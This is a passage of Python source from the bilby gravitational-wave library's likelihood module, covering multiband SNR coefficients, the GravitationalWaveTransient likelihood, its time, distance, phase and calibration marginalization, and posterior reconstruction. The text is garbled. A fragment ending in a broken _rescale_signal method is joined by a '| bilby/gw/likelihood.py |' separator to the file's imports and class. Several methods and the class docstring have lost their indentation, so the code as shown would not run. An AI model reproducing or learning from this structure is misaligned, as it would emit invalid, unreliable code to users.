                ifo.frequency_domain_strain[ifo.frequency_mask] / ifo.power_spectral_density_array[ifo.frequency_mask]
            for b in range(len(self.fb_dfb) - 1):
                start_idx, end_idx = self.start_end_idxs[b]
                windows = self._window(self.banded_frequency_points[start_idx:end_idx + 1], b)
                # Downsample the data to this band's resolution: IFFT, keep the
                # last M^(b) time samples, FFT back, and pick the band's bins.
                fddata_in_ith_band = np.copy(fddata[:int(self.Nbs[b] / 2 + 1)])
                fddata_in_ith_band[-1] = 0.  # zeroing data at the Nyquist frequency
                tddata = np.fft.irfft(fddata_in_ith_band)[-self.Mbs[b]:]
                Ks, Ke = self.Ks_Ke[b]
                fddata_in_ith_band = np.fft.rfft(tddata)[Ks:Ke + 1]
                self.linear_coeffs[ifo.name] = np.append(
                    self.linear_coeffs[ifo.name], (4. / self.durations[b]) * windows * np.conj(fddata_in_ith_band))
    def _setup_quadratic_coefficients_linear_interp(self):
        """Set up coefficients by which the squares of waveforms are multiplied to compute (h, h) for the
        linear-interpolation algorithm"""
        logger.info("Linear-interpolation algorithm is used for (h, h).")
        self.quadratic_coeffs = dict((ifo.name, np.array([])) for ifo in self.interferometers)
        N = self.Nbs[-1]
        for ifo in self.interferometers:
            logger.info("Pre-computing quadratic coefficients for {}".format(ifo.name))
            # Inverse PSD on the full frequency grid; zero outside the analysis band.
            full_frequencies = np.arange(N // 2 + 1) / ifo.duration
            full_inv_psds = np.zeros(N // 2 + 1)
            full_inv_psds[:len(ifo.power_spectral_density_array)][ifo.frequency_mask] = \
                1. / ifo.power_spectral_density_array[ifo.frequency_mask]
            for i in range(len(self.fb_dfb) - 1):
                start_idx, end_idx = self.start_end_idxs[i]
                banded_frequencies = self.banded_frequency_points[start_idx:end_idx + 1]
                coeffs = np.zeros(len(banded_frequencies))
                # Each pair of neighbouring banded points (k, k+1) collects the
                # windowed inverse-PSD weight of the full-resolution bins that
                # fall between them, split linearly by distance to each endpoint.
                for k in range(len(coeffs) - 1):
                    if k == 0:
                        start_idx_in_sum = 0
                    else:
                        start_idx_in_sum = math.ceil(ifo.duration * banded_frequencies[k])
                    if k == len(coeffs) - 2:
                        end_idx_in_sum = len(full_frequencies) - 1
                    else:
                        end_idx_in_sum = math.ceil(ifo.duration * banded_frequencies[k + 1]) - 1
                    window_over_psd = full_inv_psds[start_idx_in_sum:end_idx_in_sum + 1] \
                        * self._window(full_frequencies[start_idx_in_sum:end_idx_in_sum + 1], i)
                    frequencies_in_sum = full_frequencies[start_idx_in_sum:end_idx_in_sum + 1]
                    coeffs[k] += 4. * self.durations[i] / ifo.duration * np.sum(
                        (banded_frequencies[k + 1] - frequencies_in_sum) * window_over_psd)
                    coeffs[k + 1] += 4. * self.durations[i] / ifo.duration \
                        * np.sum((frequencies_in_sum - banded_frequencies[k]) * window_over_psd)
                self.quadratic_coeffs[ifo.name] = np.append(self.quadratic_coeffs[ifo.name], coeffs)
    def _setup_quadratic_coefficients_ifft_fft(self):
        """Set up coefficients needed for the IFFT-FFT algorithm to compute (h, h)"""
        logger.info("IFFT-FFT algorithm is used for (h, h).")
        N = self.Nbs[-1]
        # variables defined below correspond to \hat{N}^(b), \hat{T}^(b), \tilde{I}^(b)_{c, k}, h^(b)_{c, m} and
        # \sqrt{w^(b)(f^(b)_k)} \tilde{h}(f^(b)_k) in the paper
        Nhatbs = [min(2 * Mb, Nb) for Mb, Nb in zip(self.Mbs, self.Nbs)]
        self.Tbhats = [self.interferometers.duration * Nbhat / Nb for Nb, Nbhat in zip(self.Nbs, Nhatbs)]
        self.Ibcs = dict((ifo.name, []) for ifo in self.interferometers)
        self.hbcs = dict((ifo.name, []) for ifo in self.interferometers)
        self.wths = dict((ifo.name, []) for ifo in self.interferometers)
        for ifo in self.interferometers:
            logger.info("Pre-computing quadratic coefficients for {}".format(ifo.name))
            # Inverse PSD on the full frequency grid; zero outside the analysis band.
            full_inv_psds = np.zeros(N // 2 + 1)
            full_inv_psds[:len(ifo.power_spectral_density_array)][ifo.frequency_mask] = 1. / \
                ifo.power_spectral_density_array[ifo.frequency_mask]
            for b in range(len(self.fb_dfb) - 1):
                # Truncated inverse-PSD kernel for band b: keep the first/last
                # samples of the time-domain transform and FFT back.
                Imb = np.fft.irfft(full_inv_psds[:self.Nbs[b] // 2 + 1])
                half_length = Nhatbs[b] // 2
                Imbc = np.append(Imb[:half_length + 1], Imb[-(Nhatbs[b] - half_length - 1):])
                self.Ibcs[ifo.name].append(np.fft.rfft(Imbc))
                # Allocate arrays for IFFT-FFT operations
                self.hbcs[ifo.name].append(np.zeros(Nhatbs[b]))
                self.wths[ifo.name].append(np.zeros(self.Mbs[b] // 2 + 1, dtype=complex))
        # precompute windows and their squares
        self.windows = np.array([])
        self.square_root_windows = np.array([])
        for b in range(len(self.fb_dfb) - 1):
            start, end = self.start_end_idxs[b]
            ws = self._window(self.banded_frequency_points[start:end + 1], b)
            self.windows = np.append(self.windows, ws)
            self.square_root_windows = np.append(self.square_root_windows, np.sqrt(ws))
    def calculate_snrs(self, waveform_polarizations, interferometer):
        """
        Compute the snrs for multi-banding

        Parameters
        ----------
        waveform_polarizations: waveform
        interferometer: bilby.gw.detector.Interferometer

        Returns
        -------
        snrs: named tuple of snrs
        """
        # Project the polarizations onto the detector at the banded frequency points.
        strain = np.zeros(len(self.banded_frequency_points), dtype=complex)
        for mode in waveform_polarizations:
            response = interferometer.antenna_response(
                self.parameters['ra'], self.parameters['dec'],
                self.parameters['geocent_time'], self.parameters['psi'],
                mode
            )
            strain += waveform_polarizations[mode][self.unique_to_original_frequencies] * response
        # Total time shift: geocenter offset from data start plus geocenter-to-detector delay.
        dt = interferometer.time_delay_from_geocenter(
            self.parameters['ra'], self.parameters['dec'],
            self.parameters['geocent_time'])
        dt_geocent = self.parameters['geocent_time'] - interferometer.strain_data.start_time
        ifo_time = dt_geocent + dt
        calib_factor = interferometer.calibration_model.get_calibration_factor(
            self.banded_frequency_points, prefix='recalib_{}_'.format(interferometer.name), **self.parameters)
        strain *= np.exp(-1j * 2. * np.pi * self.banded_frequency_points * ifo_time)
        strain *= np.conjugate(calib_factor)
        # (d, h) from the precomputed banded linear coefficients.
        d_inner_h = np.dot(strain, self.linear_coeffs[interferometer.name])
        if self.linear_interpolation:
            # (h, h) via the precomputed linear-interpolation coefficients.
            optimal_snr_squared = np.vdot(
                np.real(strain * np.conjugate(strain)),
                self.quadratic_coeffs[interferometer.name]
            )
        else:
            # (h, h) via the IFFT-FFT algorithm, band by band.
            optimal_snr_squared = 0.
            for b in range(len(self.fb_dfb) - 1):
                Ks, Ke = self.Ks_Ke[b]
                start_idx, end_idx = self.start_end_idxs[b]
                Mb = self.Mbs[b]
                if b == 0:
                    # First band is at full resolution: sum directly over 1/PSD.
                    optimal_snr_squared += (4. / self.interferometers.duration) * np.vdot(
                        np.real(strain[start_idx:end_idx + 1] * np.conjugate(strain[start_idx:end_idx + 1])),
                        interferometer.frequency_mask[Ks:Ke + 1] * self.windows[start_idx:end_idx + 1]
                        / interferometer.power_spectral_density_array[Ks:Ke + 1])
                else:
                    self.wths[interferometer.name][b][Ks:Ke + 1] = self.square_root_windows[start_idx:end_idx + 1] \
                        * strain[start_idx:end_idx + 1]
                    self.hbcs[interferometer.name][b][-Mb:] = np.fft.irfft(self.wths[interferometer.name][b])
                    thbc = np.fft.rfft(self.hbcs[interferometer.name][b])
                    optimal_snr_squared += (4. / self.Tbhats[b]) * np.vdot(
                        np.real(thbc * np.conjugate(thbc)), self.Ibcs[interferometer.name][b])
        complex_matched_filter_snr = d_inner_h / (optimal_snr_squared**0.5)
        return self._CalculatedSNRs(
            d_inner_h=d_inner_h, optimal_snr_squared=optimal_snr_squared,
            complex_matched_filter_snr=complex_matched_filter_snr,
            d_inner_h_squared_tc_array=None,
            d_inner_h_array=None,
            optimal_snr_squared_array=None)
def _rescale_signal(self, signal, new_distance):
for mode in signal:
signal[mode] *= self._ref_dist / new_distance | bilby/gw/likelihood.py | import os
import json
import copy
import math
import attr
import numpy as np
import pandas as pd
from scipy.special import logsumexp
from ..core.likelihood import Likelihood
from ..core.utils import BilbyJsonEncoder, decode_bilby_json
from ..core.utils import (
logger, UnsortedInterp2d, create_frequency_series, create_time_series,
speed_of_light, solar_mass, radius_of_earth, gravitational_constant,
round_up_to_power_of_two)
from ..core.prior import Interped, Prior, Uniform, PriorDict, DeltaFunction
from .detector import InterferometerList, get_empty_interferometer, calibration
from .prior import BBHPriorDict, CBCPriorDict, Cosmological
from .source import lal_binary_black_hole
from .utils import (
noise_weighted_inner_product, build_roq_weights, zenith_azimuth_to_ra_dec,
ln_i0
)
from .waveform_generator import WaveformGenerator
class GravitationalWaveTransient(Likelihood):
""" A gravitational-wave transient likelihood object
This is the usual likelihood object to use for transient gravitational
wave parameter estimation. It computes the log-likelihood in the frequency
domain assuming a colored Gaussian noise model described by a power
spectral density. See Thrane & Talbot (2019), arxiv.org/abs/1809.02293.
Parameters
==========
interferometers: list, bilby.gw.detector.InterferometerList
A list of `bilby.detector.Interferometer` instances - contains the
detector data and power spectral densities
waveform_generator: `bilby.waveform_generator.WaveformGenerator`
An object which computes the frequency-domain strain of the signal,
given some set of parameters
distance_marginalization: bool, optional
If true, marginalize over distance in the likelihood.
This uses a look up table calculated at run time.
The distance prior is set to be a delta function at the minimum
distance allowed in the prior being marginalised over.
time_marginalization: bool, optional
If true, marginalize over time in the likelihood.
This uses a FFT to calculate the likelihood over a regularly spaced
grid.
In order to cover the whole space the prior is set to be uniform over
the spacing of the array of times.
If using time marginalisation and jitter_time is True a "jitter"
parameter is added to the prior which modifies the position of the
grid of times.
phase_marginalization: bool, optional
If true, marginalize over phase in the likelihood.
This is done analytically using a Bessel function.
The phase prior is set to be a delta function at phase=0.
calibration_marginalization: bool, optional
If true, marginalize over calibration response curves in the likelihood.
This is done numerically over a number of calibration response curve realizations.
priors: dict, optional
If given, used in the distance and phase marginalization.
Warning: when using marginalisation the dict is overwritten which will change the
the dict you are passing in. If this behaviour is undesired, pass `priors.copy()`.
distance_marginalization_lookup_table: (dict, str), optional
If a dict, dictionary containing the lookup_table, distance_array,
(distance) prior_array, and reference_distance used to construct
the table.
If a string the name of a file containing these quantities.
The lookup table is stored after construction in either the
provided string or a default location:
'.distance_marginalization_lookup_dmin{}_dmax{}_n{}.npz'
calibration_lookup_table: dict, optional
If a dict, contains the arrays over which to marginalize for each interferometer or the filepaths of the
calibration files.
If not provided, but calibration_marginalization is used, then the appropriate file is created to
contain the curves.
number_of_response_curves: int, optional
Number of curves from the calibration lookup table to use.
Default is 1000.
starting_index: int, optional
Sets the index for the first realization of the calibration curve to be considered.
This, coupled with number_of_response_curves, allows for restricting the set of curves used. This can be used
when dealing with large frequency arrays to split the calculation into sections.
Defaults to 0.
jitter_time: bool, optional
Whether to introduce a `time_jitter` parameter. This avoids either
missing the likelihood peak, or introducing biases in the
reconstructed time posterior due to an insufficient sampling frequency.
Default is False, however using this parameter is strongly encouraged.
reference_frame: (str, bilby.gw.detector.InterferometerList, list), optional
Definition of the reference frame for the sky location.
- :code:`sky`: sample in RA/dec, this is the default
- e.g., :code:`"H1L1", ["H1", "L1"], InterferometerList(["H1", "L1"])`:
sample in azimuth and zenith, `azimuth` and `zenith` defined in the
          frame where the z-axis is aligned with the vector connecting H1
and L1.
time_reference: str, optional
Name of the reference for the sampled time parameter.
- :code:`geocent`/:code:`geocenter`: sample in the time at the
Earth's center, this is the default
- e.g., :code:`H1`: sample in the time of arrival at H1
Returns
=======
Likelihood: `bilby.core.likelihood.Likelihood`
A likelihood object, able to compute the likelihood of the data given
some model parameters
"""
    @attr.s
    class _CalculatedSNRs:
        # Container for the per-interferometer SNR quantities returned by calculate_snrs.
        d_inner_h = attr.ib()  # inner product (d, h)
        optimal_snr_squared = attr.ib()  # inner product (h, h)
        complex_matched_filter_snr = attr.ib()  # d_inner_h / sqrt(optimal_snr_squared)
        d_inner_h_array = attr.ib()  # optional array form; None when not used
        optimal_snr_squared_array = attr.ib()  # optional array form; None when not used
        d_inner_h_squared_tc_array = attr.ib()  # optional array form; None when not used
    def __init__(
        self, interferometers, waveform_generator, time_marginalization=False,
        distance_marginalization=False, phase_marginalization=False, calibration_marginalization=False, priors=None,
        distance_marginalization_lookup_table=None, calibration_lookup_table=None,
        number_of_response_curves=1000, starting_index=0, jitter_time=True, reference_frame="sky",
        time_reference="geocenter"
    ):
        self.waveform_generator = waveform_generator
        super(GravitationalWaveTransient, self).__init__(dict())
        self.interferometers = InterferometerList(interferometers)
        self.time_marginalization = time_marginalization
        self.distance_marginalization = distance_marginalization
        self.phase_marginalization = phase_marginalization
        self.calibration_marginalization = calibration_marginalization
        self.priors = priors
        self._check_set_duration_and_sampling_frequency_of_waveform_generator()
        self.jitter_time = jitter_time
        self.reference_frame = reference_frame
        # Non-geocenter time reference: resolve the reference detector and
        # disable time marginalization, which only supports geocenter time.
        if "geocent" not in time_reference:
            self.time_reference = time_reference
            self.reference_ifo = get_empty_interferometer(self.time_reference)
            if self.time_marginalization:
                logger.info("Cannot marginalise over non-geocenter time.")
                self.time_marginalization = False
                self.jitter_time = False
        else:
            self.time_reference = "geocent"
            self.reference_ifo = None
        if self.time_marginalization:
            self._check_marginalized_prior_is_set(key='geocent_time')
            self._setup_time_marginalization()
            # NOTE: the passed-in priors dict is mutated here (documented in the
            # class docstring: pass priors.copy() to avoid this).
            priors['geocent_time'] = float(self.interferometers.start_time)
            if self.jitter_time:
                # Jitter shifts the discrete time grid to avoid missing the peak.
                priors['time_jitter'] = Uniform(
                    minimum=- self._delta_tc / 2,
                    maximum=self._delta_tc / 2,
                    boundary='periodic',
                    name="time_jitter",
                    latex_label="$t_j$"
                )
            self._marginalized_parameters.append('geocent_time')
        elif self.jitter_time:
            # Jitter only makes sense together with time marginalization.
            logger.debug(
                "Time jittering requested with non-time-marginalised "
                "likelihood, ignoring.")
            self.jitter_time = False
        if self.phase_marginalization:
            self._check_marginalized_prior_is_set(key='phase')
            priors['phase'] = float(0)
            self._marginalized_parameters.append('phase')
        if self.distance_marginalization:
            self._lookup_table_filename = None
            self._check_marginalized_prior_is_set(key='luminosity_distance')
            # Evaluate the distance prior on a fixed grid for the lookup table.
            self._distance_array = np.linspace(
                self.priors['luminosity_distance'].minimum,
                self.priors['luminosity_distance'].maximum, int(1e4))
            self.distance_prior_array = np.array(
                [self.priors['luminosity_distance'].prob(distance)
                 for distance in self._distance_array])
            # Reference distance: the median (rescale at 0.5) of the prior.
            self._ref_dist = self.priors['luminosity_distance'].rescale(0.5)
            self._setup_distance_marginalization(
                distance_marginalization_lookup_table)
            # Remove alternative distance parameterizations to avoid conflicts.
            for key in ['redshift', 'comoving_distance']:
                if key in priors:
                    del priors[key]
            priors['luminosity_distance'] = float(self._ref_dist)
            self._marginalized_parameters.append('luminosity_distance')
        if self.calibration_marginalization:
            self.number_of_response_curves = number_of_response_curves
            self.starting_index = starting_index
            self._setup_calibration_marginalization(calibration_lookup_table)
            self._marginalized_parameters.append('recalib_index')
def __repr__(self):
return self.__class__.__name__ + '(interferometers={},\n\twaveform_generator={},\n\ttime_marginalization={}, ' \
'distance_marginalization={}, phase_marginalization={}, '\
'calibration_marginalization={}, priors={})'\
.format(self.interferometers, self.waveform_generator, self.time_marginalization,
self.distance_marginalization, self.phase_marginalization, self.calibration_marginalization,
self.priors)
    def _check_set_duration_and_sampling_frequency_of_waveform_generator(self):
        """ Align the waveform_generator's duration, sampling_frequency and
        start_time with the interferometers.

        The interferometer values always take precedence: if the
        waveform_generator attribute is unset or differs, it is overwritten
        (with a debug message) rather than raising.
        """
        attributes = ['duration', 'sampling_frequency', 'start_time']
        for attribute in attributes:
            wfg_attr = getattr(self.waveform_generator, attribute)
            ifo_attr = getattr(self.interferometers, attribute)
            if wfg_attr is None:
                logger.debug(
                    "The waveform_generator {} is None. Setting from the "
                    "provided interferometers.".format(attribute))
            elif wfg_attr != ifo_attr:
                logger.debug(
                    "The waveform_generator {} is not equal to that of the "
                    "provided interferometers. Overwriting the "
                    "waveform_generator.".format(attribute))
            # Note: executed on every iteration, even when the values already
            # agree (harmless re-assignment of the same value).
            setattr(self.waveform_generator, attribute, ifo_attr)
    def calculate_snrs(self, waveform_polarizations, interferometer):
        """
        Compute the snrs

        Computes the single-detector inner products <d, h> and <h, h>, the
        complex matched-filter SNR, and — when time and/or calibration
        marginalization is active — the corresponding per-time / per-curve
        arrays used by the marginalized likelihoods.

        Parameters
        ==========
        waveform_polarizations: dict
            A dictionary of waveform polarizations and the corresponding array
        interferometer: bilby.gw.detector.Interferometer
            The bilby interferometer object
        """
        signal = interferometer.get_detector_response(
            waveform_polarizations, self.parameters)
        _mask = interferometer.frequency_mask
        if 'recalib_index' in self.parameters:
            # A specific calibration draw has been selected: apply it to the
            # template within the analysis band.
            signal[_mask] *= self.calibration_draws[interferometer.name][int(self.parameters['recalib_index'])]
        d_inner_h = interferometer.inner_product(signal=signal)
        optimal_snr_squared = interferometer.optimal_snr_squared(signal=signal)
        complex_matched_filter_snr = d_inner_h / (optimal_snr_squared**0.5)
        d_inner_h_array = None
        optimal_snr_squared_array = None
        if self.time_marginalization and self.calibration_marginalization:
            # Shape (n_freq, n_curves): one integrand column per calibration
            # draw, then FFT over the frequency axis to obtain <d, h> as a
            # function of coalescence time for each curve.
            d_inner_h_integrand = np.tile(
                interferometer.frequency_domain_strain.conjugate() * signal /
                interferometer.power_spectral_density_array, (self.number_of_response_curves, 1)).T
            d_inner_h_integrand[_mask] *= self.calibration_draws[interferometer.name].T
            d_inner_h_array =\
                4 / self.waveform_generator.duration * np.fft.fft(
                    d_inner_h_integrand[0:-1], axis=0).T
            optimal_snr_squared_integrand = 4. / self.waveform_generator.duration *\
                np.abs(signal)**2 / interferometer.power_spectral_density_array
            optimal_snr_squared_array = np.dot(optimal_snr_squared_integrand[_mask],
                                               self.calibration_abs_draws[interferometer.name].T)
        elif self.time_marginalization and not self.calibration_marginalization:
            # FFT of the overlap integrand gives <d, h> on the discrete
            # coalescence-time grid; the last frequency sample is dropped.
            d_inner_h_array =\
                4 / self.waveform_generator.duration * np.fft.fft(
                    signal[0:-1] *
                    interferometer.frequency_domain_strain.conjugate()[0:-1] /
                    interferometer.power_spectral_density_array[0:-1])
        elif self.calibration_marginalization and ('recalib_index' not in self.parameters):
            # One scalar <d, h> and <h, h> per calibration draw.
            d_inner_h_integrand = 4. / self.waveform_generator.duration * \
                interferometer.frequency_domain_strain.conjugate() * signal / \
                interferometer.power_spectral_density_array
            d_inner_h_array = np.dot(d_inner_h_integrand[_mask], self.calibration_draws[interferometer.name].T)
            optimal_snr_squared_integrand = 4. / self.waveform_generator.duration *\
                np.abs(signal)**2 / interferometer.power_spectral_density_array
            optimal_snr_squared_array = np.dot(optimal_snr_squared_integrand[_mask],
                                               self.calibration_abs_draws[interferometer.name].T)
        return self._CalculatedSNRs(
            d_inner_h=d_inner_h, optimal_snr_squared=optimal_snr_squared,
            complex_matched_filter_snr=complex_matched_filter_snr,
            d_inner_h_array=d_inner_h_array,
            optimal_snr_squared_array=optimal_snr_squared_array,
            d_inner_h_squared_tc_array=None)
def _check_marginalized_prior_is_set(self, key):
if key in self.priors and self.priors[key].is_fixed:
raise ValueError(
"Cannot use marginalized likelihood for {}: prior is fixed"
.format(key))
if key not in self.priors or not isinstance(
self.priors[key], Prior):
logger.warning(
'Prior not provided for {}, using the BBH default.'.format(key))
if key == 'geocent_time':
self.priors[key] = Uniform(
self.interferometers.start_time,
self.interferometers.start_time + self.interferometers.duration)
elif key == 'luminosity_distance':
for key in ['redshift', 'comoving_distance']:
if key in self.priors:
if not isinstance(self.priors[key], Cosmological):
raise TypeError(
"To marginalize over {}, the prior must be specified as a "
"subclass of bilby.gw.prior.Cosmological.".format(key)
)
self.priors['luminosity_distance'] = self.priors[key].get_corresponding_prior(
'luminosity_distance'
)
del self.priors[key]
else:
self.priors[key] = BBHPriorDict()[key]
@property
def priors(self):
return self._prior
@priors.setter
def priors(self, priors):
if priors is not None:
self._prior = priors.copy()
elif any([self.time_marginalization, self.phase_marginalization,
self.distance_marginalization]):
raise ValueError("You can't use a marginalized likelihood without specifying a priors")
else:
self._prior = None
def noise_log_likelihood(self):
log_l = 0
for interferometer in self.interferometers:
mask = interferometer.frequency_mask
log_l -= noise_weighted_inner_product(
interferometer.frequency_domain_strain[mask],
interferometer.frequency_domain_strain[mask],
interferometer.power_spectral_density_array[mask],
self.waveform_generator.duration) / 2
return float(np.real(log_l))
    def log_likelihood_ratio(self):
        """Log likelihood ratio (signal vs. Gaussian noise) for self.parameters.

        Accumulates per-detector inner products, then dispatches to the
        appropriate marginalized likelihood depending on which
        marginalizations were enabled at construction time.
        """
        waveform_polarizations =\
            self.waveform_generator.frequency_domain_strain(self.parameters)
        self.parameters.update(self.get_sky_frame_parameters())
        if waveform_polarizations is None:
            # Waveform generation failed: return the largest finite penalty.
            return np.nan_to_num(-np.inf)
        d_inner_h = 0.
        optimal_snr_squared = 0.
        complex_matched_filter_snr = 0.
        if self.time_marginalization and self.calibration_marginalization:
            if self.jitter_time:
                # Apply the sampled jitter; it is subtracted again below.
                self.parameters['geocent_time'] += self.parameters['time_jitter']
            # One row of time samples per calibration draw.
            d_inner_h_array = np.zeros(
                (self.number_of_response_curves, len(self.interferometers.frequency_array[0:-1])),
                dtype=np.complex128)
            optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
        elif self.time_marginalization:
            if self.jitter_time:
                self.parameters['geocent_time'] += self.parameters['time_jitter']
            d_inner_h_array = np.zeros(
                len(self.interferometers.frequency_array[0:-1]),
                dtype=np.complex128)
        elif self.calibration_marginalization:
            d_inner_h_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
            optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
        for interferometer in self.interferometers:
            per_detector_snr = self.calculate_snrs(
                waveform_polarizations=waveform_polarizations,
                interferometer=interferometer)
            d_inner_h += per_detector_snr.d_inner_h
            optimal_snr_squared += np.real(per_detector_snr.optimal_snr_squared)
            complex_matched_filter_snr += per_detector_snr.complex_matched_filter_snr
            if self.time_marginalization or self.calibration_marginalization:
                d_inner_h_array += per_detector_snr.d_inner_h_array
            if self.calibration_marginalization:
                optimal_snr_squared_array += per_detector_snr.optimal_snr_squared_array
        if self.calibration_marginalization and self.time_marginalization:
            log_l = self.time_and_calibration_marginalized_likelihood(
                d_inner_h_array=d_inner_h_array,
                h_inner_h=optimal_snr_squared_array)
            if self.jitter_time:
                # Undo the jitter shift applied above.
                self.parameters['geocent_time'] -= self.parameters['time_jitter']
        elif self.calibration_marginalization:
            log_l = self.calibration_marginalized_likelihood(
                d_inner_h_calibration_array=d_inner_h_array,
                h_inner_h=optimal_snr_squared_array)
        elif self.time_marginalization:
            log_l = self.time_marginalized_likelihood(
                d_inner_h_tc_array=d_inner_h_array,
                h_inner_h=optimal_snr_squared)
            if self.jitter_time:
                self.parameters['geocent_time'] -= self.parameters['time_jitter']
        elif self.distance_marginalization:
            log_l = self.distance_marginalized_likelihood(
                d_inner_h=d_inner_h, h_inner_h=optimal_snr_squared)
        elif self.phase_marginalization:
            log_l = self.phase_marginalized_likelihood(
                d_inner_h=d_inner_h, h_inner_h=optimal_snr_squared)
        else:
            log_l = np.real(d_inner_h) - optimal_snr_squared / 2
        return float(log_l.real)
    def generate_posterior_sample_from_marginalized_likelihood(self):
        """
        Reconstruct the distance posterior from a run which used a likelihood
        which explicitly marginalised over time/distance/phase.

        See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293

        Returns
        =======
        sample: dict
            Returns the parameters with new samples.

        Notes
        =====
        This involves a deepcopy of the signal to avoid issues with waveform
        caching, as the signal is overwritten in place.
        """
        if any([self.phase_marginalization, self.distance_marginalization,
                self.time_marginalization, self.calibration_marginalization]):
            # Deepcopy because the distance reconstruction rescales the
            # polarizations in place (see _rescale_signal).
            signal_polarizations = copy.deepcopy(
                self.waveform_generator.frequency_domain_strain(
                    self.parameters))
        else:
            # Nothing was marginalized: the current parameters are complete.
            return self.parameters
        if self.calibration_marginalization and self.time_marginalization:
            raise AttributeError(
                "Cannot use time and calibration marginalization simultaneously for regeneration at the moment!"
                "The matrix manipulation has not been tested.")
        # Order matters: each reconstructed parameter is written back into
        # self.parameters before the next conditional sample is drawn.
        if self.calibration_marginalization:
            new_calibration = self.generate_calibration_sample_from_marginalized_likelihood(
                signal_polarizations=signal_polarizations)
            self.parameters['recalib_index'] = new_calibration
        if self.time_marginalization:
            new_time = self.generate_time_sample_from_marginalized_likelihood(
                signal_polarizations=signal_polarizations)
            self.parameters['geocent_time'] = new_time
        if self.distance_marginalization:
            new_distance = self.generate_distance_sample_from_marginalized_likelihood(
                signal_polarizations=signal_polarizations)
            self.parameters['luminosity_distance'] = new_distance
        if self.phase_marginalization:
            new_phase = self.generate_phase_sample_from_marginalized_likelihood(
                signal_polarizations=signal_polarizations)
            self.parameters['phase'] = new_phase
        return self.parameters.copy()
    def generate_calibration_sample_from_marginalized_likelihood(
            self, signal_polarizations=None):
        """
        Generate a single sample from the posterior distribution for the set of calibration response curves when
        explicitly marginalizing over the calibration uncertainty.

        Parameters
        ----------
        signal_polarizations: dict, optional
            Polarizations modes of the template.

        Returns
        -------
        new_calibration: dict
            Sample set from the calibration posterior
        """
        # Drop any fixed draw so the likelihood is evaluated for every curve.
        if 'recalib_index' in self.parameters:
            self.parameters.pop('recalib_index')
        self.parameters.update(self.get_sky_frame_parameters())
        if signal_polarizations is None:
            signal_polarizations = \
                self.waveform_generator.frequency_domain_strain(self.parameters)
        log_like = self.get_calibration_log_likelihoods(signal_polarizations=signal_polarizations)
        # Softmax of the per-curve log likelihoods gives posterior weights.
        calibration_post = np.exp(log_like - max(log_like))
        calibration_post /= np.sum(calibration_post)
        new_calibration = np.random.choice(self.number_of_response_curves, p=calibration_post)
        return new_calibration
    def generate_time_sample_from_marginalized_likelihood(
            self, signal_polarizations=None):
        """
        Generate a single sample from the posterior distribution for coalescence
        time when using a likelihood which explicitly marginalises over time.

        In order to resolve the posterior we artificially upsample to 16kHz.

        See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293

        Parameters
        ==========
        signal_polarizations: dict, optional
            Polarizations modes of the template.

        Returns
        =======
        new_time: float
            Sample from the time posterior.
        """
        self.parameters.update(self.get_sky_frame_parameters())
        if self.jitter_time:
            self.parameters['geocent_time'] += self.parameters['time_jitter']
        if signal_polarizations is None:
            signal_polarizations = \
                self.waveform_generator.frequency_domain_strain(self.parameters)
        # Dense time grid at 16 kHz, wrapped back into the analysis segment.
        times = create_time_series(
            sampling_frequency=16384,
            starting_time=self.parameters['geocent_time'] - self.waveform_generator.start_time,
            duration=self.waveform_generator.duration)
        times = times % self.waveform_generator.duration
        times += self.waveform_generator.start_time
        prior = self.priors["geocent_time"]
        in_prior = (times >= prior.minimum) & (times < prior.maximum)
        times = times[in_prior]
        # Zero-pad each detector's frequency series up to the 16 kHz grid
        # length so a single FFT yields <d, h> on the dense time grid.
        n_time_steps = int(self.waveform_generator.duration * 16384)
        d_inner_h = np.zeros(len(times), dtype=complex)
        psd = np.ones(n_time_steps)
        signal_long = np.zeros(n_time_steps, dtype=complex)
        data = np.zeros(n_time_steps, dtype=complex)
        h_inner_h = np.zeros(1)
        for ifo in self.interferometers:
            ifo_length = len(ifo.frequency_domain_strain)
            mask = ifo.frequency_mask
            signal = ifo.get_detector_response(
                signal_polarizations, self.parameters)
            signal_long[:ifo_length] = signal
            data[:ifo_length] = np.conj(ifo.frequency_domain_strain)
            psd[:ifo_length][mask] = ifo.power_spectral_density_array[mask]
            d_inner_h += np.fft.fft(signal_long * data / psd)[in_prior]
            h_inner_h += ifo.optimal_snr_squared(signal=signal).real
        if self.distance_marginalization:
            time_log_like = self.distance_marginalized_likelihood(
                d_inner_h, h_inner_h)
        elif self.phase_marginalization:
            time_log_like = ln_i0(abs(d_inner_h)) - h_inner_h.real / 2
        else:
            time_log_like = (d_inner_h.real - h_inner_h.real / 2)
        time_prior_array = self.priors['geocent_time'].prob(times)
        time_post = (
            np.exp(time_log_like - max(time_log_like)) * time_prior_array)
        # Keep only the bulk of the posterior to build the interpolant.
        keep = (time_post > max(time_post) / 1000)
        if sum(keep) < 3:
            # Interpolation needs a few points: widen the kept window.
            keep[1:-1] = keep[1:-1] | keep[2:] | keep[:-2]
        time_post = time_post[keep]
        times = times[keep]
        new_time = Interped(times, time_post).sample()
        return new_time
    def generate_distance_sample_from_marginalized_likelihood(
            self, signal_polarizations=None):
        """
        Generate a single sample from the posterior distribution for luminosity
        distance when using a likelihood which explicitly marginalises over
        distance.

        See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293

        Parameters
        ==========
        signal_polarizations: dict, optional
            Polarizations modes of the template.
            Note: These are rescaled in place after the distance sample is
            generated to allow further parameter reconstruction to occur.

        Returns
        =======
        new_distance: float
            Sample from the distance posterior.
        """
        self.parameters.update(self.get_sky_frame_parameters())
        if signal_polarizations is None:
            signal_polarizations = \
                self.waveform_generator.frequency_domain_strain(self.parameters)
        d_inner_h, h_inner_h = self._calculate_inner_products(signal_polarizations)
        # Rescale the inner products from the sampled distance onto the whole
        # distance grid: <d, h> scales as 1/D, <h, h> as 1/D^2.
        d_inner_h_dist = (
            d_inner_h * self.parameters['luminosity_distance'] /
            self._distance_array)
        h_inner_h_dist = (
            h_inner_h * self.parameters['luminosity_distance']**2 /
            self._distance_array**2)
        if self.phase_marginalization:
            distance_log_like = (
                ln_i0(abs(d_inner_h_dist)) -
                h_inner_h_dist.real / 2
            )
        else:
            distance_log_like = (d_inner_h_dist.real - h_inner_h_dist.real / 2)
        distance_post = (np.exp(distance_log_like - max(distance_log_like)) *
